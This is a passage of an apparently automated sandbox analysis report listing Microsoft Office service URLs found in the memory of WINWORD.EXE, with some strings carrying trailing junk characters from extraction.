Source: WINWORD.EXE, 00000000.00000002.3014847999.000001D79C8A2000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3014847999.000001D79C958000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3003494409.000001D79BA32000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=8192&uilcid=103
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/templates/gallerygtQ
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/templates/searchi/facts
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/templates/startenticated;t
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/templates/list/v2
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A3D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net:443dows
Source: WINWORD.EXE, 00000000.00000002.2998895883.000001D78F095000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metadata.templates.cdn.office.netft1
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mss.office.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeeche
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechir
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ncus.pagecontentsync.
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ncus.pagecontentsync.onenote.com/pagecontentsync/attachment/v1nc/attachment/v1
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.comDict_E2C.PNG
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexusrules.officeapps.live.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nleditor.osi.office.net/NlEditor/CloudSuggest/V1/V1tF~u
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nleditor.osi.office.net/NlEditor/Instrumentation/V1/V1
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nleditor.osi.office.net/NlEditor/LanguageInfo/V1/V1Ept
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://notification.m365.svc.cloud.microsoft/PushNotifications.Register
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://notification.m365.svc.cloud.microsoft/api/v1/registertfreeformspeech
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord8u
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordeechquC
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/docs/recentstem
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/docs/sharedwithme
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/docs/v2.0/sharedwithme
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/locations/recento
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/quickaccess/sitesandteamsq~
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ocws.officeapps.live.com/ocs/v2/recent
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/api/storeuserstatus
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/help/clientdeveloper
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/catalog
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A533000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/catalog0-C000-000000000046
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A51B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/catalog?lcid=1033&syslcid=8192&uilcid=1033&app=0&
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/liveredir
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/reportserviceerror
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/serviceaddj~Y
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/userconnectedt=strict&hostType=ImmersiveApp
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/servicemanager/v
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/onedrive_16_2.pnghttps://odc.officeapps.live.com/
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/sm/sharepoint_16_2.pnghttps://odc.officeapps.live.co
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd8
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/idp
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell7
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A3D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net8n1wk
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com%U
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comoUE
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comu
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officepyservice.office.net/&
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://oloobe.officeapps.live.com/itiesgs
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ols.officeapps.live.com/nAppHelpch3
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ols.officeapps.live.com/olsc/OlsClient.svc/OlsClient
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ols.officeapps.live.com/olsc/OlsClient.svc/OlsClientF
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ols.officeapps.live.com/olsc/olsconfig.svc/pin/v2/)w
Source: WINWORD.EXE, 00000000.00000002.2999370908.000001D7963AF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ols.officeapps.live.com/olsc/olsconfig.svc/redemption/localeslLSID~
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated=
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdateddll
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesaspx
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseRu
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.comR
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.comU
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://osi.office.netst
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/owa/wopibootstrapperNA
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A500000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A429000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.comS.DLL
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A429000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A500000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsontqK
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/ews/exchange.asmx
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/owa/wopibootstrapperNA
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/tasks?app&hostApp=metaOSHubivityFeedStateytK
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pagecontentsync.onenote.com/pagecontentsync/attachment/v1nc/attachment/v1
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonPvb
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: WINWORD.EXE, 00000000.00000002.2999370908.000001D7964E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13atess?
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13db8
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: WINWORD.EXE, 00000000.00000002.2999370908.000001D796490000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pptcs.officeapps.live.com/pptauto/PowerpointAutomation.svc/PptAutomationC24F9BFD666761B26807
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pptcs.officeapps.live.com/pptauto/PowerpointAutomation.svc/rest)
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pptcts.officeapps.live.com/pptcts/Home.aspxsvc/PptSamplell
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pptcts.officeapps.live.com/pptcts/ce/v1/redeem
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pptservicescast.officeapps.live.com/SpeechHandler.ashx
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pptsgs.officeapps.live.com/pptsgs/FrontDoor.ashx
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pptsgs.officeapps.live.com/pptsgs/FrontDoor.ashxervice.svc/root/mlS
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A429000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pptsgs.officeapps.live.com/pptsgs/PowerpointSuggestion.svc/OutlineToPPT/GetThemeSuggestionsf
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pptsgs.officeapps.live.com/pptsgs/PowerpointSuggestion.svc/OutlineToPPT/Trace
Source: WINWORD.EXE, 00000000.00000002.2999370908.000001D796490000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pptsgs.officeapps.live.com/pptsgs/PowerpointSuggestion.svc/PptSuggestionicrosoft
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pptss.officeapps.live.com/pptss/powerpointsample.svc/PptSampleu
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectorybpQ
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod.support.office.com/InAppHelp1001
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod.support.office.com/InAppHelp1001o
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod.support.office.com/InAppHelpev=3J
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod.support.office.com/InAppHelps=3
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod.support.office.com/InAppHelpslk
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://profile.live.com/cid-%s/d-%s/Rgf
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://profile.live.com/home/home$g
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://realtimesync.onenote.com/realtimechannel/v1.0/signalr/hubv1.0/signalr/hubE
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40asmxJ
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/office-growth/resources/staticc
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/polymer/models/init
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/polymer/modelsw
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsh
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://revere.osi.office.net/api/v
Source: WINWORD.EXE, 00000000.00000002.3013412770.000001D79C518000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://roaming.officeapps.live.com/Q
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://roaming.officeapps.live.com/rs/RoamingSoapService.svcQ
Source: WINWORD.EXE, 00000000.00000002.3013412770.000001D79C518000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://roaming.officeapps.live.com/rs/RoamingSoapService.svcg
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A589000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://roaming.officeapps.live.com/rs/v1/settingseserviceredir.aspxe
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A3D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://roaming.officeapps.live.com:443/rs/RoamingSoapService.svcX
Source: WINWORD.EXE, 00000000.00000002.2998895883.000001D78EFD6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://send-to-kindle-word-win32.office.com/
Source: WINWORD.EXE, 00000000.00000002.2998895883.000001D78EFD6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://send-to-kindle-word-win32.office.com/(
Source: WINWORD.EXE, 00000000.00000002.2998895883.000001D78EFD6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://send-to-kindle-word-win32.office.com/?status=failedp0
Source: WINWORD.EXE, 00000000.00000002.2998895883.000001D78EFD6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://send-to-kindle-word-win32.office.com/?status=succeededI
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://shredder.osi.office.net/ShredderService/web/desktop/views/main.cshtmltml
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A533000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup?ru=https://login.live.com/oauth20_authorize.srf%3fclient_id%3d0000000
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://skyapi.live.net/Activity/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://staging.cortana.ai
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://staging.cortana.aiNQd
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A51B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assets/illustrations/win32/m365-device-desktop-dark-1
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A51B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assets/illustrations/win32/m365-device-desktop-dark-2
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A51B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assets/illustrations/win32/m365-device-desktop-hc-100
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A51B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assets/illustrations/win32/m365-device-desktop-hc-150
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A51B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assets/illustrations/win32/m365-device-desktop-hc-200
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A51B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assets/illustrations/win32/m365-device-desktop-light-
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://storage.azure.com/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://storage.live.com/clientlogs/uploadlocationhmeS-1-5
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://store.office.com/client/consent.aspx
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com#T
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/M365.Accesspxspx
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A554000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWritex
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/OfficeIntelligence/v1.0/ingestion
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/OfficeIntelligence/v1.0/insights1
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/OfficePersonalizationUserLifecycle/api/facts
Source: WINWORD.EXE, 00000000.00000002.2999370908.000001D796490000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/imageB2/v1.0/me/image/resize%28width%3D384%2Cheight%3D384%2CallowResize
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/ows/v2/ActivityFeed/UpdateActivityFeedState
